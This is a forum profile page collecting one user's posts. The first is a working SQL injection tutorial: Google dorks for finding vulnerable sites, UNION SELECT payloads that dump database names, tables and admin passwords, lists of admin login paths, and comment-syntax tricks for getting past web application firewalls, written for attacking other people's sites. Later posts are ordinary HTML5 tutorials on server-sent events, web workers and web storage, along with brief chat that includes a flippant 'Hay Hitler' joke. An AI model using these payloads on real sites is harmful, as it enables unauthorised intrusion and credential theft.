
MrHotFire

Banned
  • Posts

    1,283
  • Credits

  • Joined

  • Last visited

    Never
  • Feedback

    0%

Everything posted by MrHotFire

  1. What Is an SQL Injection?

     An SQL Injection is basically a code injection that exploits the area vulnerable to SQL Injection. The injected code will be exploiting the Database, to get Information, such as Emails, Usernames, Passwords, etc. In this Tutorial, we'll be looking for the Admin Panel's credentials. Keep in mind, I said Admin Panel, not control panel. While performing an SQL Injection, you may not always find what you're looking for. Some sites have secured the important information, so that it will not be compromised so easily.

     Finding a Vulnerable Site

     You can find a vulnerable site using Dorks. Use google, it's the best way. A dork is something like this:

         inurl:news.php?id=
         inurl:event.php?id=
         inurl:order.php?id=
         inurl:user.php?id=
         inurl:restaurant.php?id=
         inurl:buy.php?id=

     There are Hundreds of Thousands of others, and there are also some Posts about Dorks, so you could read those if you want to find a good site to exploit with SQL Injection.

     Exploiting the Database

     Alright? Are you all ready for the fun of an SQL Injection? Okay, so first, we need to test our site to see if it's vulnerable to SQL Injection. I will use a random site name for my Example:

         http://www.hopefullyvulnerablesite.com/event.php?id=1

     Our site HAS to have an '=' in it. Otherwise we cannot use SQL Injection to exploit the Database. So after the 1 (In the ID) put a ' so that it looks like this:

         http://www.hopefullyvulnerablesite.com/event.php?id=1'

     Now if we get a MySQL error, then our site is probably vulnerable. If it just refreshes the page normally, then our site is not vulnerable.

     Finding the number of columns

     Now, we know our site is vulnerable to SQL Injection, so we want to start getting the Info out of the Database. But before we do that, we have to find out WHICH columns are vulnerable to SQL Injection. But we don't know how many columns there are yet, so we need that first. To find the number of columns we need to use a command called 'Order By'. This command will help us determine how many columns there are. So your URL should now look like this:

         http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 2--

     Now if the site just refreshed to its normal state, that's good. So we didn't get an error, so we have to continue until we get an error.

         http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 3--   *NO ERROR*
         http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 4--   *NO ERROR*
         http://www.hopefullyvulnerablesite.com/event.php?id=1 order by 5--   *ERROR*

     Okay, we got an error on column 5. That means there are only 4 columns. Since the 5th column doesn't exist, we got an error.

     Tip: The two hyphens (--) are critical for executing the command. The two hyphens will tell the site that it's a command, and will execute. So we NEED those at the end of every command.

     Finding the vulnerable column

     We now have the number of columns. But we just need to find out which one(s) are vulnerable to the execution of SQL commands. So we will use a command called "union select". This is what will find the vulnerable column(s). So we need to add that command into our URL. After that command, we need to add the number of columns there are. So now our URL should look like this:

         http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,2,3,4--

     A couple of numbers will appear on your screen. That is normal, and is a good sign. Those numbers are the numbers of the columns that are vulnerable to SQL Injection. So those are the columns we need to execute our commands in. So let's say that column 2 appeared on the Page. We will be executing commands in column 2.

     Tip: You HAVE to have the - after the =. That is critical.

     Determining the Version of the MySQL Database

     Why do we need the version, you ask? Because the version will let us know what commands we can use. I consider version 5 easier. So I will tell you how to get information from the Database with version 5. So our vulnerable column is 2. So that's where we'll be executing the code. Replace the 2 with your command. The command is: @@version. So your URL should now look like this:

         http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,@@version,3,4--

     Now it should display the Version on the page. It should look something like this:

         5.1.47-community-log

     The numbers don't matter, as long as they're at least 5, or over.

     Finding the name of the Database

     The name of the Database is important. At least if we want to look in the Tables which will contain the information. To find the name of the database, there are 2 most common ways. They both will work. The first command is:

         http://hopefullyvulnerablesite/event.php?id=-1 union select 1,group_concat(schema_name),3,4 from information_schema.schemata--

     Sometimes, that command will show you more than the Database name. But all we want is the database name, so the better command would preferably be:

         http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,concat(database()),3,4--

     Now you will be shown the Database name. Congrats, look how far we are already. Now to the good stuff!

     Viewing the Tables in the Database

     The tables are what contain information. That's why we need to view them. So we can get the information we seek. The command to view the tables is longer than the few we've seen already. So here's what your URL should now look like:

         http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(table_name),3,4 FROM information_schema.tables WHERE table_schema=database()--

     Hit enter, and the Tables in the Database will be displayed. :happyforever:

     Viewing the Tables' information

     We will most likely be given many tables. It is up to you to decide which one contains the valuable information. So it can be at times difficult to choose a table that would contain important information. However, we will not always need the username, as it is most likely "admin". But the password is what we REALLY need. So choose a table. The one I will use for this example will be "admin_credentials". It's very rare that you'll get a Table with a title basically making you choose that one. So this time use this query/command:

         http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name="admin_credentials"

     For that query, you will almost ALWAYS get an error. So instead, convert the 'admin_credentials' to Hex. Once you've converted your Table Name to Hex, you'll need to use the query again, but with Hex. So it should look like this:

         http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(column_name),3,4 FROM information_schema.columns WHERE table_name=0x61646d696e5f63726564656e7469616c73

     You MUST have the 0x after the =. The 0x will let the site know that you are executing the command with HEX. So it's critical. Otherwise, it will NOT work.

     Displaying the Contents

     There will still be some tables inside the table you've chosen. So you need to get the information, and that will usually mean goodbye tables, and HELLO Admin Panel access. Let's say that mine is displaying "userpword" and "user". Those are the only columns that are displaying for me (However, this will very rarely be the case). So we need to access the information in there. We can access them both at a time actually. But if you prefer one at a time, use this query:

         http://www.hopefullyvulnerablesite.com/event.php?id=-1 union select 1,group_concat(userpword),3,4 FROM DBName.admin_credentials--

     That will display the information. Where it says DBName, you need to put the name of the Database you got earlier in this tutorial. And where it says admin_credentials, you need to put the table that you are inside of. Now we should have all the credentials, so we just need to find the Admin Login.

     Finding the AdminLogin

     Usually, all you'll have to do is take a quick look by adding a small /admin or /index.php/admin. Like this:

         http://www.hopefullyvulnerablesite.com/admin
         http://www.hopefullyvulnerablesite.com/admin.php
         http://www.hopefullyvulnerablesite.com/login.php
         http://www.hopefullyvulnerablesite.com/admin/index.php
         http://www.hopefullyvulnerablesite.com/login/index.php
         http://www.hopefullyvulnerablesite.com/adminlogin
         http://www.hopefullyvulnerablesite.com/adminlogin.php
         http://www.hopefullyvulnerablesite.com/adminlogin/index.php
         http://www.hopefullyvulnerablesite.com/moderator.php
         http://www.hopefullyvulnerablesite.com/moderator
         http://www.hopefullyvulnerablesite.com/modlogin

     And there are plenty more. At times, you will not find the Login, so you'll need an "Admin Login" finder. There are some online, and there are also downloads. I recommend doing it manually, because it brings more pride after hacking the Website.

     WAF By-Passing

     You may be asking, what is WAF By-Passing? First off, I'll be explaining what WAF is. WAF stands for Web Application Firewall. A Web Application Firewall is put in place, so that their website will be secure from attacks such as SQL Injection, XSS, and more exploitation methods. The WAF filters commands put through to the Database, and detects attacks against the site. A WAF Error will look like this:

         FORBIDDEN
         You are not allowed to access "" on this server
         *INFORMATION ABOUT THE WEBSERVER IS HERE*

     If we get that error when we're using Union Select, that means that there is a WAF set in the webserver. So, in order to by-pass it, we'll have to change our Syntax of the command, so that the filter doesn't detect an attack. There are several methods on how to by-pass the WAF, I will be explaining a few:

     1. You don't have to worry about getting the number of columns, the Firewalls don't block that, however, they DO block the union select command, so here is method 1, on how to By-Pass the Firewall. The code we're going to be using will be using different "Symbols" to by-pass the filter. It looks like this:

         http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,2,3--

     That will by-pass the Firewall. However, we still have several steps. Because we still need the other information from the tables and columns. Once that is done, we will be getting the information from the vulnerable columns, so here's what it should look like:

         http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,CoNcAt(version()),3--

     To make this tutorial a little shorter, we'll be grabbing more information with just one command. So let's try it like this:

         http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,CoNcAt(version(),0x3a,user(),0x3a,database(),0x3a),3--

     Now, it should be displaying the information we asked for IN ORDER. So it'll be showing the Version, then the Username, then the Database name. Now we'll be getting the table names. So we will again have to by-pass the WAF. This time, the command will look like this:

         http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,Group_Concat(table_name),3 from /*!information_schema*/.tables where table_schema=database()--

     Now, that will be displaying all the tables. Now, to access the table's information, we're going to use this command to by-pass the firewall:

         http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,Group_Concat(column_name),3 from /*!information_schema*/.columns where table_name=0x*HEX CODE OF THE TABLE NAME*--

     There we go, now we're looking at the information of the tables. Now we want to dump the columns, so here's what we'll use:

         http://www.hopefullyvulnerablesite.com/event.php?id=-1 /*!UNION*/ /*!SELECT*/ 1,Group_Concat(*COLUMN NAME HERE*),3 from *DATABASE NAME HERE*.*TABLE NAME HERE*

     And that's all for WAF By-Passing. Hopefully now, you're an SQL Injection expert :). If you need any more help, feel free to PM me, or even add a comment. I really hope this helped, good luck!
:happyforever: :happyforever: :happyforever: :happyforever: :troll: :troll: :troll: :troll: :troll: :troll: :troll:
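The request patterns the post above walks through (the quote probe, ORDER BY column counting, UNION SELECT, information_schema lookups, hex-encoded literals, and the /*! */ comment form used to get past a filter) are exactly what a WAF rule or a log-review job matches on. The following JavaScript is an added example that is not part of the original post: it parses Apache-style access-log lines, normalises the query string the way a rule engine does before matching, and reports which indicators fired. The log lines, client addresses and timestamps are constructed for the example.

```javascript
// Added example (not from the original post): detect the SQL-injection request
// shapes shown in the tutorial above in web-server access logs.

// Common Log Format: host ident user [time] "METHOD path HTTP/x" status bytes
const LOG_LINE_RE = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+/;

function parseLogLine(line) {
  const m = LOG_LINE_RE.exec(line);
  if (!m) return null;
  return { client: m[1], time: m[2], method: m[3], path: m[4], status: Number(m[5]) };
}

// Normalise the query string before matching: percent-decode, turn MySQL
// "/*! keyword */" executable comments back into the keyword, drop other
// block comments, collapse whitespace and lower-case. Without this step the
// /*!UNION*/ /*!SELECT*/ form from the post slips past a naive substring match.
function normaliseQuery(path) {
  const qs = path.includes('?') ? path.slice(path.indexOf('?') + 1) : '';
  let s;
  try { s = decodeURIComponent(qs.replace(/\+/g, ' ')); } catch { s = qs; }
  s = s.replace(/\/\*!\s*([\s\S]*?)\s*\*\//g, ' $1 ');  // /*!UNION*/ -> UNION
  s = s.replace(/\/\*[\s\S]*?\*\//g, ' ');             // remaining /* ... */
  return s.replace(/\s+/g, ' ').trim().toLowerCase();
}

// Indicator list in the order the tutorial uses the techniques. The quote
// heuristic is deliberately noisy (a legitimate O'Brien also trips it); treat
// it as a weak signal to combine with the others.
const INDICATORS = [
  { name: 'union-select',       re: /\bunion\b[\s\S]{0,40}?\bselect\b/ },
  { name: 'order-by-probe',     re: /\border by \d+\s*--/ },
  { name: 'information-schema', re: /\binformation_schema\b/ },
  { name: 'version-probe',      re: /@@version|\bversion\s*\(\s*\)/ },
  { name: 'hex-literal-compare', re: /=\s*0x[0-9a-f]{2,}/ },
  { name: 'comment-terminator', re: /--\s*$/ },
  { name: 'unbalanced-quote',   re: null },   // odd number of single quotes
];

function sqliIndicators(path) {
  const q = normaliseQuery(path);
  const hits = [];
  for (const ind of INDICATORS) {
    if (ind.re) {
      if (ind.re.test(q)) hits.push(ind.name);
    } else if ((q.match(/'/g) || []).length % 2 === 1) {
      hits.push(ind.name);
    }
  }
  return hits;
}

// Run over a log; return one finding per request that tripped any indicator.
function scanAccessLog(lines) {
  const findings = [];
  for (const line of lines) {
    const rec = parseLogLine(line);
    if (!rec) continue;                       // skip malformed lines
    const indicators = sqliIndicators(rec.path);
    if (indicators.length) {
      findings.push({ client: rec.client, time: rec.time, path: rec.path, status: rec.status, indicators });
    }
  }
  return findings;
}

// Constructed sample log (documentation IP ranges, made-up timestamps) that
// replays the tutorial's sequence against event.php, plus one benign request.
const SAMPLE_LOG = [
  '203.0.113.7 - - [10/Oct/2023:13:55:36 +0000] "GET /event.php?id=1 HTTP/1.1" 200 5123',
  '203.0.113.7 - - [10/Oct/2023:13:55:40 +0000] "GET /event.php?id=1%27 HTTP/1.1" 500 612',
  '203.0.113.7 - - [10/Oct/2023:13:55:52 +0000] "GET /event.php?id=1%20order%20by%205-- HTTP/1.1" 500 612',
  '203.0.113.7 - - [10/Oct/2023:13:56:10 +0000] "GET /event.php?id=-1%20union%20select%201,@@version,3,4-- HTTP/1.1" 200 4987',
  '203.0.113.7 - - [10/Oct/2023:13:57:02 +0000] "GET /event.php?id=-1%20/*!UNION*/%20/*!SELECT*/%201,Group_Concat(column_name),3%20from%20/*!information_schema*/.columns%20where%20table_name=0x61646d696e-- HTTP/1.1" 403 199',
  '198.51.100.23 - - [10/Oct/2023:13:58:00 +0000] "GET /news.php?id=42&page=2 HTTP/1.1" 200 8811',
];

for (const f of scanAccessLog(SAMPLE_LOG)) {
  console.log(`${f.client} ${f.status} ${f.indicators.join(',')}  ${f.path}`);
}
```

Note that the 403 on the last probing request is what the post calls a WAF error; the earlier 500s on the quote and ORDER BY probes are the tell that the application itself is reaching the database with the injected text, which is the point at which a defender should look at the handler behind event.php.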
  2. How do we give +1/-1 karma while we are VIP? A friend of mine is asking.
  3. Server-Sent Events - One Way Messaging

     A server-sent event is when a web page automatically gets updates from a server. This was also possible before, but the web page would have to ask if any updates were available. With server-sent events, the updates come automatically. Example: Facebook/Twitter updates, stock price updates, news feeds, sport results, etc.

     Browser Support

     Server-Sent Events are supported in all major browsers, except Internet Explorer.

     Receive Server-Sent Event Notifications

     The EventSource object is used to receive server-sent event notifications:

         var source=new EventSource("demo_sse.php");
         source.onmessage=function(event) {
           document.getElementById("result").innerHTML+=event.data + "<br>";
         };

     Example explained:
       • Create a new EventSource object, and specify the URL of the page sending the updates (in this example "demo_sse.php")
       • Each time an update is received, the onmessage event occurs
       • When an onmessage event occurs, put the received data into the element with id="result"

     Check Server-Sent Events Support

     In the tryit example above there were some extra lines of code to check browser support for server-sent events:

         if(typeof(EventSource)!=="undefined") {
           // Yes! Server-sent events support!
           // Some code.....
         } else {
           // Sorry! No server-sent events support..
         }

     Server-Side Code Example

     For the example above to work, you need a server capable of sending data updates (like PHP or ASP). The server-side event stream syntax is simple. Set the "Content-Type" header to "text/event-stream". Now you can start sending event streams.

     Code in PHP (demo_sse.php):

         <?php
         header('Content-Type: text/event-stream');
         header('Cache-Control: no-cache');
         $time = date('r');
         echo "data: The server time is: {$time}\n\n";
         flush();
         ?>

     Code in ASP (VB) (demo_sse.asp):

         <%
         Response.ContentType="text/event-stream"
         Response.Expires=-1
         Response.Write("data: " & now())
         Response.Flush()
         %>

     Code explained:
       • Set the "Content-Type" header to "text/event-stream"
       • Specify that the page should not cache
       • Output the data to send (Always start with "data: ")
       • Flush the output data back to the web page

     The EventSource Object

     In the examples above we used the onmessage event to get messages. But other events are also available:

         Events      Description
         onopen      When a connection to the server is opened
         onmessage   When a message is received
         onerror     When an error occurs

     :happyforever: :happyforever: :happyforever: :happyforever:
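The event-stream format that demo_sse.php above writes has more rules than the single "data:" line the post shows: data may span several lines, there are event, id and retry fields, lines starting with ":" are comments, and the browser receives the stream in chunks that can split a line. The parser below is an added example, not part of the original post or of any browser's code; it follows the WHATWG event-stream grammar, and the sample chunks it is fed are constructed here. It produces plain strings, which the consuming page should insert with textContent unless it trusts the server to send markup (the post's handler uses innerHTML).

```javascript
// Added example (not from the original post): an incremental parser for
// text/event-stream, the format EventSource consumes.

class EventStreamParser {
  constructor(onEvent) {
    this.onEvent = onEvent;   // optional callback({type, data, lastEventId})
    this.buffer = '';         // unprocessed text: a chunk may end mid-line
    this.dataLines = [];      // "data:" lines of the event being assembled
    this.eventType = '';      // "event:" field, reset after every dispatch
    this.lastEventId = '';    // "id:" field persists across events
    this.retry = null;        // "retry:" reconnection delay in ms, if any
    this.events = [];         // everything dispatched so far, for inspection
  }

  // Feed a chunk as it arrives from the network. Only complete lines are
  // processed; a trailing partial line waits for the next chunk.
  feed(chunk) {
    this.buffer += chunk;
    let idx;
    while ((idx = this.buffer.search(/\r\n|\n|\r/)) !== -1) {
      const line = this.buffer.slice(0, idx);
      const sepLen = this.buffer.startsWith('\r\n', idx) ? 2 : 1;
      this.buffer = this.buffer.slice(idx + sepLen);
      this.processLine(line);
    }
  }

  processLine(line) {
    if (line === '') { this.dispatch(); return; }   // blank line ends an event
    if (line.startsWith(':')) return;               // comment / keep-alive
    const colon = line.indexOf(':');
    let field, value;
    if (colon === -1) {
      field = line; value = '';                     // "data" alone means data: ""
    } else {
      field = line.slice(0, colon);
      value = line.slice(colon + 1);
      if (value.startsWith(' ')) value = value.slice(1);  // strip ONE space only
    }
    switch (field) {
      case 'event': this.eventType = value; break;
      case 'data':  this.dataLines.push(value); break;
      case 'id':    if (!value.includes('\0')) this.lastEventId = value; break;
      case 'retry': if (/^\d+$/.test(value)) this.retry = Number(value); break;
      default: break;                               // unknown fields are ignored
    }
  }

  dispatch() {
    if (this.dataLines.length === 0) {   // nothing to deliver: only reset the type
      this.eventType = '';
      return;
    }
    const ev = {
      type: this.eventType || 'message',
      data: this.dataLines.join('\n'),   // multi-line data joined with LF
      lastEventId: this.lastEventId,
    };
    this.dataLines = [];
    this.eventType = '';
    this.events.push(ev);
    if (this.onEvent) this.onEvent(ev);
  }
}

// Constructed sample: the shape demo_sse.php emits, then a typed event with
// id/retry and a JSON payload split across two data lines AND across two
// network chunks, then a field-without-value event, then an unfinished event.
const SAMPLE_CHUNKS = [
  ': keep-alive comment\n' +
  'data: The server time is: Tue, 10 Oct 2023 13:55:36 +0000\n\n' +
  'event: price\nid: 17\nretry: 5000\ndata: {"sym":"ACME",\ndata:  "px":4',
  '2.5}\n\n' +
  'id\ndata\n\n' +
  'data: trailing without blank line',
];

function parseSample(chunks = SAMPLE_CHUNKS) {
  const parser = new EventStreamParser((ev) => console.log(ev.type, JSON.stringify(ev.data)));
  for (const c of chunks) parser.feed(c);
  return parser;
}
```

The last chunk's unterminated "data:" line stays in the buffer and is never dispatched, which is the behaviour the post's PHP relies on when it ends each message with "\n\n".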
  4. What is a Web Worker?

     When executing scripts in an HTML page, the page becomes unresponsive until the script is finished. A web worker is a JavaScript that runs in the background, independently of other scripts, without affecting the performance of the page. You can continue to do whatever you want: clicking, selecting things, etc., while the web worker runs in the background.

     Browser Support

     Web workers are supported in all major browsers, except Internet Explorer.

     Check Web Worker Support

     Before creating a web worker, check whether the user's browser supports it:

         if(typeof(Worker)!=="undefined") {
           // Yes! Web worker support!
           // Some code.....
         } else {
           // Sorry! No Web Worker support..
         }

     Create a Web Worker File

     Now, let's create our web worker in an external JavaScript. Here, we create a script that counts. The script is stored in the "demo_workers.js" file:

         var i=0;
         function timedCount() {
           i=i+1;
           postMessage(i);
           // pass the function itself, not a string to be evaluated
           setTimeout(timedCount,500);
         }
         timedCount();

     The important part of the code above is the postMessage() method, which is used to post a message back to the HTML page.

     Note: Normally web workers are not used for such simple scripts, but for more CPU intensive tasks.

     Create a Web Worker Object

     Now that we have the web worker file, we need to call it from an HTML page. The following lines check if the worker already exists, and if not, create a new web worker object and run the code in "demo_workers.js":

         if(typeof(w)=="undefined") {
           w=new Worker("demo_workers.js");
         }

     Then we can send and receive messages from the web worker. Add an "onmessage" event listener to the web worker.

         w.onmessage=function(event){
           document.getElementById("result").innerHTML=event.data;
         };

     When the web worker posts a message, the code within the event listener is executed. The data from the web worker is stored in event.data.

     Terminate a Web Worker

     When a web worker object is created, it will continue to listen for messages (even after the external script is finished) until it is terminated. To terminate a web worker, and free browser/computer resources, use the terminate() method:

         w.terminate();

     Full Web Worker Example Code

     We have already seen the Worker code in the .js file. Below is the code for the HTML page:

         <!DOCTYPE html>
         <html>
         <body>
         <p>Count numbers: <output id="result"></output></p>
         <button onclick="startWorker()">Start Worker</button>
         <button onclick="stopWorker()">Stop Worker</button>
         <br><br>
         <script>
         var w;
         function startWorker() {
           if(typeof(Worker)!=="undefined") {
             if(typeof(w)=="undefined") {
               w=new Worker("demo_workers.js");
             }
             w.onmessage = function (event) {
               document.getElementById("result").innerHTML=event.data;
             };
           } else {
             document.getElementById("result").innerHTML="Sorry, your browser does not support Web Workers...";
           }
         }
         function stopWorker() {
           w.terminate();
           w=undefined; // so that Start Worker creates a fresh worker afterwards
         }
         </script>
         </body>
         </html>

     Web Workers and the DOM

     Since web workers are in external files, they do not have access to the following JavaScript objects:
       • The window object
       • The document object
       • The parent object

     :happyforever: :happyforever: :happyforever: :happyforever:
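The page side of the example above takes whatever the worker posts and writes it straight into innerHTML. The following JavaScript is an added example, not code from the original post: it keeps the same counting worker but gives the exchange an explicit message shape ({type: 'count', value: n}, an assumption of this example), validates each message on the page side before rendering it as text, and shows that nothing is delivered after terminate(). The worker is modelled as a pure step function and the browser Worker is replaced by a synchronous stand-in so the logic runs outside a browser.

```javascript
// Added example (not from the original post): a validated message protocol
// between the counting worker and its page.

// Worker side: instead of calling postMessage directly, produce the next
// message from the current state so it can be exercised without a browser.
function workerStep(state) {
  const next = { count: state.count + 1 };
  return { state: next, message: { type: 'count', value: next.count } };
}

// Page side: accept only well-formed messages. Anything else is logged and
// never rendered.
function validateWorkerMessage(data) {
  if (typeof data !== 'object' || data === null) return { ok: false, reason: 'not an object' };
  if (data.type !== 'count') return { ok: false, reason: `unknown type ${String(data.type)}` };
  if (!Number.isSafeInteger(data.value) || data.value < 0) {
    return { ok: false, reason: 'value is not a non-negative integer' };
  }
  return { ok: true, value: data.value };
}

// `view` is any object with a textContent property (in a browser, the
// <output id="result"> element). textContent shows markup literally.
function makePageController(view, log = []) {
  let worker = null;
  let lastCount = null;
  return {
    start(createWorker) {           // createWorker() returns a Worker-like object
      if (worker === null) worker = createWorker();
      worker.onmessage = (event) => {
        const v = validateWorkerMessage(event.data);
        if (!v.ok) { log.push(`rejected worker message: ${v.reason}`); return; }
        lastCount = v.value;
        view.textContent = String(v.value);
      };
      return worker;
    },
    stop() { if (worker) { worker.terminate(); worker = null; } },
    get lastCount() { return lastCount; },
    get log() { return log; },
  };
}

// Constructed stand-in for the browser Worker: messages are delivered
// synchronously, and terminate() stops delivery exactly as the real one does.
function fakeWorker() {
  return {
    onmessage: null,
    terminated: false,
    deliver(data) { if (!this.terminated && this.onmessage) this.onmessage({ data }); },
    terminate() { this.terminated = true; },
  };
}

function demoWorkerProtocol() {
  const view = { textContent: '' };
  const ctl = makePageController(view);
  const w = ctl.start(fakeWorker);
  let state = { count: 0 };
  for (let i = 0; i < 3; i++) {
    const r = workerStep(state);
    state = r.state;
    w.deliver(r.message);                       // 1, 2, 3 rendered in turn
  }
  w.deliver({ type: 'count', value: '<b>42</b>' });  // rejected: not an integer
  w.deliver('7');                                    // rejected: not an object
  ctl.stop();
  w.deliver({ type: 'count', value: 99 });           // after terminate: dropped
  return { shown: view.textContent, lastCount: ctl.lastCount, rejected: ctl.log.length };
}

console.log(demoWorkerProtocol());
```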
  5. What is HTML5 Web Storage?

     With HTML5, web pages can store data locally within the user's browser. Earlier, this was done with cookies. However, Web Storage is more secure and faster. The data is not included with every server request, but used ONLY when asked for. It is also possible to store large amounts of data, without affecting the website's performance. The data is stored in key/value pairs, and a web page can only access data stored by itself.

     Browser Support

     Web storage is supported in Internet Explorer 8+, Firefox, Opera, Chrome, and Safari.

     Note: Internet Explorer 7 and earlier versions do not support web storage.

     localStorage and sessionStorage

     There are two new objects for storing data on the client:
       • localStorage - stores data with no expiration date
       • sessionStorage - stores data for one session

     Before using web storage, check browser support for localStorage and sessionStorage:

         if(typeof(Storage)!=="undefined") {
           // Yes! localStorage and sessionStorage support!
           // Some code.....
         } else {
           // Sorry! No web storage support..
         }

     The localStorage Object

     The localStorage object stores the data with no expiration date. The data will not be deleted when the browser is closed, and will be available the next day, week, or year.

         localStorage.lastname="Smith";
         document.getElementById("result").innerHTML="Last name: " + localStorage.lastname;

     Example explained:
       • Create a localStorage key/value pair with key="lastname" and value="Smith"
       • Retrieve the value of the "lastname" key and insert it into the element with id="result"

     Tip: Key/value pairs are always stored as strings. Remember to convert them to another format when needed.

     The following example counts the number of times a user has clicked a button. In this code the value string is converted to a number to be able to increase the counter:

         if (localStorage.clickcount) {
           localStorage.clickcount=Number(localStorage.clickcount)+1;
         } else {
           localStorage.clickcount=1;
         }
         document.getElementById("result").innerHTML="You have clicked the button " + localStorage.clickcount + " time(s).";

     The sessionStorage Object

     The sessionStorage object is equal to the localStorage object, except that it stores the data for only one session. The data is deleted when the user closes the browser window.

     The following example counts the number of times a user has clicked a button, in the current session:

         if (sessionStorage.clickcount) {
           sessionStorage.clickcount=Number(sessionStorage.clickcount)+1;
         } else {
           sessionStorage.clickcount=1;
         }
         document.getElementById("result").innerHTML="You have clicked the button " + sessionStorage.clickcount + " time(s) in this session.";

     :happyforever: :happyforever: :happyforever:
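Three points from the post above tend to bite in real code: values are always strings, localStorage entries never expire on their own, and the page must check for support first. The wrapper below is an added example, not code from the original post: it JSON-encodes values so types survive the round trip, attaches an optional expiry to each entry, discards entries that are malformed or expired, and falls back to an in-memory store when the Storage interface is absent. The "app:" namespace, the MemoryStorage shim and the demo data are this example's own; in a browser, pass window.localStorage or window.sessionStorage to TypedStore instead. Because any script running on the origin can read web storage, the example stores preferences and counters, not credentials.

```javascript
// Added example (not from the original post): typed, namespaced web storage
// with per-entry expiry, exercised against an in-memory Storage stand-in.

// Minimal implementation of the Storage interface (getItem/setItem/removeItem/
// key/length) so the wrapper can run outside a browser.
class MemoryStorage {
  constructor() { this.map = new Map(); }
  getItem(k) { return this.map.has(k) ? this.map.get(k) : null; }
  setItem(k, v) { this.map.set(k, String(v)); }   // real storage stringifies too
  removeItem(k) { this.map.delete(k); }
  get length() { return this.map.size; }
  key(i) { const k = [...this.map.keys()][i]; return k === undefined ? null : k; }
}

// The post's support check, turned into a chooser with a fallback.
function pickStorage(kind = 'local') {
  if (typeof Storage !== 'undefined' && typeof window !== 'undefined') {
    return kind === 'session' ? window.sessionStorage : window.localStorage;
  }
  return new MemoryStorage();
}

class TypedStore {
  // `now` is injectable so expiry can be tested without waiting.
  constructor(storage, namespace = 'app', now = () => Date.now()) {
    this.storage = storage;
    this.ns = namespace + ':';
    this.now = now;
  }

  // Store any JSON-serialisable value; ttlMs === null means "no expiry".
  set(key, value, ttlMs = null) {
    const rec = { v: value, exp: ttlMs === null ? null : this.now() + ttlMs };
    this.storage.setItem(this.ns + key, JSON.stringify(rec));
  }

  // Return the stored value, or `fallback` if missing, expired or malformed.
  // Bad entries are removed so they do not keep failing on every read.
  get(key, fallback = undefined) {
    const full = this.ns + key;
    const raw = this.storage.getItem(full);
    if (raw === null) return fallback;
    let rec;
    try { rec = JSON.parse(raw); } catch { this.storage.removeItem(full); return fallback; }
    if (!rec || typeof rec !== 'object' || !('v' in rec)) { this.storage.removeItem(full); return fallback; }
    if (rec.exp !== null && rec.exp !== undefined && this.now() >= rec.exp) {
      this.storage.removeItem(full);
      return fallback;
    }
    return rec.v;
  }

  // The post's click counter: the string-to-number conversion happens once, here.
  increment(key, by = 1) {
    const cur = this.get(key, 0);
    const next = (typeof cur === 'number' ? cur : 0) + by;
    this.set(key, next);
    return next;
  }

  // Keys owned by this namespace, without the prefix.
  keys() {
    const out = [];
    for (let i = 0; i < this.storage.length; i++) {
      const k = this.storage.key(i);
      if (k !== null && k.startsWith(this.ns)) out.push(k.slice(this.ns.length));
    }
    return out;
  }
}

function demoStorage() {
  let clock = 1000000;                                   // fake milliseconds
  const store = new TypedStore(new MemoryStorage(), 'app', () => clock);
  store.increment('clickcount');
  store.increment('clickcount');
  store.increment('clickcount');                         // -> 3, stored as a number
  store.set('prefs', { theme: 'dark', cols: 4 });        // object survives round trip
  store.set('promo-seen', true, 60000);                  // expires after 60 s
  const before = store.get('promo-seen');
  clock += 61000;
  const after = store.get('promo-seen', 'expired');
  store.storage.setItem('app:broken', '{not json');      // corrupted entry
  return {
    clicks: store.get('clickcount'),
    prefs: store.get('prefs'),
    before, after,
    broken: store.get('broken', null),
    keys: store.keys(),
  };
}

console.log(demoStorage());
```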
  6. hahahahhaah...I really enjoy this shower! Hay Hitler!(:p) Great share.
  7. The only way to turn off GPS cell phone tracking is by turning off your cell phone. :rage: or remove the GPS receiving antenna. :alone:
  8. I have never bought from there, but it looks good. It has good prices and good products. :happyforever: